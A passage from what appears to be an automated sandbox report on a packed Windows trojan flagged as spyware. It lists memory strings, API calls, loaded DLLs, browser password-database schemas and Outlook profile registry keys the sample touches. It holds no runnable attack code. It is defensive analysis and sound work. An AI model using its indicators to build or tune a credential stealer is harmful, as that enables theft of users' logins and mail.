Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839	0_2_006EE839
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DF8EE	0_2_006DF8EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738D2	0_2_007738D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F39F7	0_2_006F39F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E626D	0_2_006E626D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005AFA5D	0_2_005AFA5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B4250	0_2_005B4250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E1B61	0_2_006E1B61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006684AC	0_2_006684AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066DD78	0_2_0066DD78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F5502	0_2_006F5502
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006ECDE9	0_2_006ECDE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DDDC8	0_2_006DDDC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E971D	0_2_006E971D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E47F0	0_2_006E47F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F1FAB	0_2_006F1FAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E8787	0_2_005E8787
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003245C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2388706540.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2387960445.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: xfniszhi ZLIB complexity 0.9947508271496328

Source: file.exe, 00000000.00000002.2359171753.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2086620561.0000000004B60000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00339600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00333720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00333720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VV9C9P5K.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2216020779.000000001D2CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201337914.000000001D2D8000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr, AAFIDGCFHIEHJJJJECAK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1829376 > 1048576

Source: file.exe

Static PE information: Raw size of xfniszhi is bigger than: 0x100000 < 0x198800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xfniszhi:EW;punnpugg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xfniszhi:EW;punnpugg:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

